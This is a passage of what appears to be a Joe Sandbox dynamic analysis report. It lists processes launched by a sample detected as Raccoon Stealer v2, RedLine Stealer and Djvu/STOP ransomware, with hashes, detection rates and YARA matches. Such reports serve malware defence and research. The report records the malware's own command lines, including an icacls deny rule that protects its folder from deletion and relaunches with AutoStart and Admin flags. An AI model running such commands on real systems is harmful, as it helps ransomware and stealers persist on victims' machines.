                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                    • Detection: 56%, ReversingLabs

                                                                                    Target ID:19
                                                                                    Start time:19:45:05
                                                                                    Start date:07/02/2023
                                                                                    Path:C:\Users\user\AppData\Local\Temp\D8D3.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\D8D3.exe
                                                                                    Imagebase:0x400000
                                                                                    File size:200192 bytes
                                                                                    MD5 hash:0CA939E14D58B13997144F0AF89ADEA9
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000013.00000003.441885976.000000000087E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000013.00000003.462471829.000000000087E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000013.00000003.465231730.000000000087E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000013.00000003.511550380.000000000087E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000013.00000003.514324898.000000000087C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000013.00000003.517099850.0000000000874000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000013.00000003.464907460.000000000087E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000013.00000003.464370990.000000000087E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000013.00000003.462319085.000000000087E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000013.00000003.441770993.000000000083A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000013.00000003.464693455.000000000087E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000013.00000003.441770993.000000000087E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000013.00000003.444370287.000000000087E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000013.00000003.446299900.000000000087E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Joe Sandbox ML

                                                                                    Target ID:20
                                                                                    Start time:19:45:08
                                                                                    Start date:07/02/2023
                                                                                    Path:C:\Users\user\AppData\Local\Temp\llpb1133.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\llpb1133.exe"
                                                                                    Imagebase:0x140000000
                                                                                    File size:3657728 bytes
                                                                                    MD5 hash:81A0ECC23B44DA5116D397C0A3104A05
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Avira
                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                    • Detection: 77%, ReversingLabs

                                                                                    Target ID:21
                                                                                    Start time:19:45:09
                                                                                    Start date:07/02/2023
                                                                                    Path:C:\Windows\SysWOW64\icacls.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:icacls "C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0" /deny *S-1-1-0:(OI)(CI)(DE,DC)
                                                                                    Imagebase:0xf40000
                                                                                    File size:29696 bytes
                                                                                    MD5 hash:FF0D1D4317A44C951240FAE75075D501
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language

                                                                                    Target ID:26
                                                                                    Start time:19:45:19
                                                                                    Start date:07/02/2023
                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 996 -s 520
                                                                                    Imagebase:0x360000
                                                                                    File size:434592 bytes
                                                                                    MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language

                                                                                    Target ID:27
                                                                                    Start time:19:45:22
                                                                                    Start date:07/02/2023
                                                                                    Path:C:\Users\user\AppData\Local\Temp\pliu.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\pliu.exe"
                                                                                    Imagebase:0x400000
                                                                                    File size:163840 bytes
                                                                                    MD5 hash:B9363486500E209C05F97330226BBF8A
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Antivirus matches:
                                                                                    • Detection: 85%, ReversingLabs

                                                                                    Target ID:28
                                                                                    Start time:19:45:22
                                                                                    Start date:07/02/2023
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff745070000
                                                                                    File size:625664 bytes
                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language

                                                                                    Target ID:29
                                                                                    Start time:19:45:23
                                                                                    Start date:07/02/2023
                                                                                    Path:C:\Users\user\AppData\Local\Temp\XandETC.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\XandETC.exe"
                                                                                    Imagebase:0x7ff6ec770000
                                                                                    File size:3890176 bytes
                                                                                    MD5 hash:3006B49F3A30A80BB85074C279ACC7DF
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Antivirus matches:
                                                                                    • Detection: 92%, ReversingLabs

                                                                                    Target ID:33
                                                                                    Start time:19:45:26
                                                                                    Start date:07/02/2023
                                                                                    Path:C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe" --AutoStart
                                                                                    Imagebase:0x400000
                                                                                    File size:722944 bytes
                                                                                    MD5 hash:46909DA148DE57B2D85591626AEDBD76
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000021.00000002.516055302.00000000022BA000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000021.00000002.516427401.0000000002350000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000021.00000002.516427401.0000000002350000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                    • Detection: 62%, ReversingLabs

                                                                                    Target ID:35
                                                                                    Start time:19:45:31
                                                                                    Start date:07/02/2023
                                                                                    Path:C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe --Task
                                                                                    Imagebase:0x400000
                                                                                    File size:722944 bytes
                                                                                    MD5 hash:46909DA148DE57B2D85591626AEDBD76
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language

                                                                                    Target ID:39
                                                                                    Start time:19:45:35
                                                                                    Start date:07/02/2023
                                                                                    Path:C:\Users\user\AppData\Local\Temp\3046.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\3046.exe" --Admin IsNotAutoStart IsNotTask
                                                                                    Imagebase:0x400000
                                                                                    File size:722944 bytes
                                                                                    MD5 hash:46909DA148DE57B2D85591626AEDBD76
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000027.00000002.517661661.00000000022E4000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000027.00000002.518320509.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000027.00000002.518320509.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Author: unknown

                                                                                    Target ID:40
                                                                                    Start time:19:45:35
                                                                                    Start date:07/02/2023
                                                                                    Path:C:\Users\user\AppData\Local\Temp\pliu.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\pliu.exe" -h
                                                                                    Imagebase:0x400000
                                                                                    File size:163840 bytes
                                                                                    MD5 hash:B9363486500E209C05F97330226BBF8A
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language

                                                                                    Target ID:41
                                                                                    Start time:19:45:36
                                                                                    Start date:07/02/2023
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff745070000
                                                                                    File size:625664 bytes
                                                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language

                                                                                    Target ID:42
                                                                                    Start time:19:45:36
                                                                                    Start date:07/02/2023
                                                                                    Path:C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\AppData\Local\09cc62dd-ff65-4927-b82d-d455eaaeb9f0\3046.exe" --AutoStart
                                                                                    Imagebase:0x400000
                                                                                    File size:722944 bytes
                                                                                    MD5 hash:46909DA148DE57B2D85591626AEDBD76
                                                                                    Has elevated privileges:false
                                                                                    Has administrator privileges:false
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000002A.00000002.518333813.0000000002290000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                    • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000002A.00000002.518796436.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000002A.00000002.518796436.0000000002330000.00000040.00001000.00020000.00000000.sdmp, Author: unknown

                                                                                    No disassembly